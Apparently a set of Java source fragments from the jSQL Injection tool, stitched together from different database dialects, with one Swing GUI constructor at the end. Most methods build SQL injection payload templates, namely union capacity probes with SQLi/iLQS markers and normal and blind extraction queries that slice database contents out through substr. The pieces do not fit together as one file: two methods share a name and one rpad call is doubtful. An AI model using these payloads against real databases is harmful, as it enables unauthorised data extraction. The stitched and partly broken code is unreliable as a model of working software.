/**
 * Replaces every {@code 1337<index>7331} placeholder of the initial query with a
 * subquery that returns the {@code SQLi<index>} marker followed by filler text.
 *
 * <p>The subquery is written in Oracle-style SQL (it uses {@code utl_raw},
 * {@code DBMS_LOB} and {@code dual}). The filler comes from
 * {@code rpad('%23',1024,'%23')} and is cut by {@code SUBSTR(...,1,3996)}.
 * Presumably the caller measures how much of it comes back per index; confirm
 * against the caller.
 *
 * <p>The {@code SQLi} marker and the run of {@code %23} (URL-encoded '#') are fixed
 * literals, so a request carrying this fragment is recognisable in web-server or WAF logs.
 *
 * @param indexes index values, joined with {@code |} into a regex alternation
 * @return the initial query with each matching placeholder replaced
 */
@Override
public String performanceQuery(String[] indexes) {
    // Group 1 captures the index; the replacement refers to it as $1.
    // NOTE(review): indexes are joined into the pattern unquoted. Presumably they are
    // plain digits; confirm with callers.
    String placeholderPattern = "1337(" + ToolsString.join(indexes, "|") + ")7331";

    // Original author's note: rpad 1024 (not 65536) to avoid error
    // 'result of string concatenation is too long'.
    StringBuilder fillerSubquery = new StringBuilder();
    fillerSubquery
        .append("(SELECT+TO_CHAR(")
        .append("(SELECT*")
        .append("FROM")
        .append("(SELECT'SQLi$1'")
        .append("||SUBSTR(")
        .append("(SELECT+utl_raw.cast_to_varchar2(CAST(DBMS_LOB.SUBSTR(REPLACE(REPLACE(XmlAgg(XmlElement(\"a\",rawtohex(")
        .append("s")
        .append("))")
        .append("ORDER+BY+s+nulls+last).getClobVal(),'<a>',''),'<%2fa>',rawtohex('6'))")
        .append("||rawtohex('1337'),4000,1)AS+VARCHAR(1024)))")
        .append("FROM")
        .append("(SELECT+DISTINCT+rpad('%23',1024,'%23')s+FROM+dual")
        .append(")")
        .append("),1,3996)")
        .append("FROM+dual")
        .append(")x")
        .append("))")
        .append("FROM+dual)");

    return MediatorModel.model().initialQuery.replaceAll(placeholderPattern, fillerSubquery.toString());
}
/**
 * Replaces every {@code 1337<index>7331} placeholder of the initial query with an
 * expression that wraps the index and 1024 filler characters between the
 * {@code SQLi} and {@code iLQS} markers.
 *
 * <p>Both markers and the {@code %23} (URL-encoded '#') filler are fixed literals,
 * so requests built from this template are recognisable in request logs.
 *
 * @param indexes index values, joined with {@code |} into a regex alternation
 * @return the initial query with each matching placeholder replaced
 */
@Override
public String getIndicesCapacity(String[] indexes) {
    // Group 1 captures the index; the replacement refers to it as $1.
    // NOTE(review): indexes are joined into the pattern unquoted. Presumably they are
    // plain digits; confirm with callers.
    String placeholderPattern = "1337(" + ToolsString.join(indexes, "|") + ")7331";

    // Marker, captured index, filler from repeat(), closing marker.
    String markedFiller = "('SQLi'||$1||repeat('%23',1024)||'iLQS')";

    return MediatorModel.model().initialQuery.replaceAll(placeholderPattern, markedFiller);
}
/**
 * Replaces every {@code 1337<index>7331} placeholder of the initial query with a
 * {@code select ... from dual} subquery that returns {@code SQLi<index>}, a run of
 * filler produced by {@code rpad}, and the closing {@code iLQS} marker.
 *
 * <p>Both markers and the {@code %23} (URL-encoded '#') filler are fixed literals,
 * so requests built from this template are recognisable in request logs.
 *
 * @param indexes index values, joined with {@code |} into a regex alternation
 * @return the initial query with each matching placeholder replaced
 */
@Override
public String getIndicesCapacity(String[] indexes) {
    // Group 1 captures the index; the replacement refers to it as $1.
    // NOTE(review): indexes are joined into the pattern unquoted. Presumably they are
    // plain digits; confirm with callers.
    String placeholderPattern = "1337(" + ToolsString.join(indexes, "|") + ")7331";

    // NOTE(review): rpad is called with four arguments here; confirm that the
    // targeted DBMS accepts that form.
    String markedFiller = "(select'SQLi$1'||rpad('%23',1024,'%23',1025)||'iLQS'from+dual)";

    return MediatorModel.model().initialQuery.replaceAll(placeholderPattern, markedFiller);
}
/**
 * Wraps {@code sqlQuery} in an outer select that returns the {@code SQLi} marker
 * followed by a slice of column {@code r} of the inner result.
 *
 * <p>The slice starts at {@code startPosition}. Its length is whatever
 * {@code MediatorModel.model().normalStrategy.getPerformanceLength()} returns.
 *
 * @param sqlQuery inner query, inserted verbatim as the derived table {@code x}
 * @param startPosition first character position passed to {@code substr}
 * @return the wrapping select statement
 */
@Override
public String normalStrategy(String sqlQuery, String startPosition) {
    String sliceStart = "select'SQLi'||substr(r," + startPosition + ",";

    // Original author's note: "Minus 'SQLi' should apply". The length is not
    // reduced by the marker's size here.
    String sliceLengthAndSource =
        MediatorModel.model().normalStrategy.getPerformanceLength()
            + ")from("
            + sqlQuery
            + ")x";

    return sliceStart + sliceLengthAndSource;
}
/**
 * Builds a parenthesised {@code select ... from dual} expression that returns the
 * {@code SQLi} marker followed by a slice of the result of {@code sqlQuery}.
 *
 * <p>The slice starts at {@code startPosition} and its length is
 * {@code MediatorModel.model().performanceLength}.
 *
 * @param sqlQuery inner query, inserted verbatim as the first argument of {@code substr}
 * @param startPosition first character position passed to {@code substr}
 * @return the parenthesised select expression
 */
@Override
public String blindStrategy(String sqlQuery, String startPosition) {
    // Fixed marker in front of the extracted slice.
    String markerPrefix = "select+" + "'SQLi'||";

    String slice =
        "substr("
            + "("
            + sqlQuery
            + "),"
            + startPosition
            + ","
            + MediatorModel.model().performanceLength
            + ")from+dual";

    return "(" + markerPrefix + slice + ")";
}
/**
 * Build the GUI: add app icon, tree icons, the 3 main panels.
 *
 * <p>Registers this frame with {@code MediatorGUI}, subscribes it to the model as an
 * observer, then assembles the menu bar, the top panel, the central output panel and
 * the status bar, in that order, on a vertical {@code BoxLayout}. A window listener
 * stores the splitter positions and the set of open bottom tabs in the user
 * {@code Preferences} when the window is closing.
 */
public JFrameGUI() {
    super("jSQL Injection");

    // Make this frame reachable through the mediator and let it receive model updates
    MediatorGUI.register(this);
    MediatorModel.model().addObserver(this);

    // Define a small and large app icon
    this.setIconImages(HelperGUI.getIcons());

    // Load UI before any component
    HelperGUI.prepareGUI();
    ShadowPopupFactory.install();

    // Save controller
    MediatorGUI.register(new Menubar());
    this.setJMenuBar(MediatorGUI.menubar());

    // Define the default panel: each component on a vertical line
    this.getContentPane().setLayout(new BoxLayout(this.getContentPane(), BoxLayout.PAGE_AXIS));

    // Textfields at the top
    MediatorGUI.register(new PanelTop());
    this.add(MediatorGUI.top());

    // Main panel for tree and tables in the middle
    JPanel mainPanel = new JPanel(new GridLayout(1, 0));
    this.outputPanel = new PanelLeftRightBottom();
    mainPanel.add(this.outputPanel);
    this.add(mainPanel);

    // Persist the layout state when the window is closing
    MediatorGUI.gui()
        .addWindowListener(
            new WindowAdapter() {
                @Override
                public void windowClosing(WindowEvent e) {
                    // Preferences node is keyed by the InjectionModel class name
                    Preferences prefs = Preferences.userRoot().node(InjectionModel.class.getName());

                    // Divider location of the left/right splitter
                    prefs.putInt(
                        PanelLeftRightBottom.VERTICALSPLITTER_PREFNAME,
                        JFrameGUI.this.outputPanel.leftRight.getDividerLocation());
                    // Stored as the panel height minus the divider location
                    prefs.putInt(
                        PanelLeftRightBottom.HORIZONTALSPLITTER_PREFNAME,
                        JFrameGUI.this.outputPanel.getHeight()
                            - JFrameGUI.this.outputPanel.getDividerLocation());

                    // Start from "not visible" for every optional tab...
                    prefs.putBoolean(HelperGUI.BINARY_VISIBLE, false);
                    prefs.putBoolean(HelperGUI.CHUNK_VISIBLE, false);
                    prefs.putBoolean(HelperGUI.NETWORK_VISIBLE, false);
                    prefs.putBoolean(HelperGUI.JAVA_VISIBLE, false);

                    // ...then flag each one that is currently present, matched by its title
                    for (int i = 0; i < MediatorGUI.bottom().getTabCount(); i++) {
                        if ("Binary".equals(MediatorGUI.bottom().getTitleAt(i))) {
                            prefs.putBoolean(HelperGUI.BINARY_VISIBLE, true);
                        } else if ("Chunk".equals(MediatorGUI.bottom().getTitleAt(i))) {
                            prefs.putBoolean(HelperGUI.CHUNK_VISIBLE, true);
                        } else if ("Network".equals(MediatorGUI.bottom().getTitleAt(i))) {
                            prefs.putBoolean(HelperGUI.NETWORK_VISIBLE, true);
                        } else if ("Java".equals(MediatorGUI.bottom().getTitleAt(i))) {
                            prefs.putBoolean(HelperGUI.JAVA_VISIBLE, true);
                        }
                    }
                }
            });

    // Info on the bottom
    MediatorGUI.register(new PanelStatusbar());
    this.add(MediatorGUI.status());

    // Reduce size of components
    this.pack(); // required after the proxy parameters have been hidden

    // Size of window
    this.setSize(1024, 768);
    this.setVisible(true);
    this.setDefaultCloseOperation(JFrame.EXIT_ON_CLOSE);

    // Center the window
    // NOTE(review): the frame is already visible when this runs, so it is shown first
    // and centered afterwards.
    this.setLocationRelativeTo(null);

    // Define the keyword shortcuts for tabs #Need to work even if the focus is not on tabs
    ActionHandler.addShortcut(this.getRootPane(), MediatorGUI.right());
    ActionHandler.addTextFieldShortcutSelectAll();
}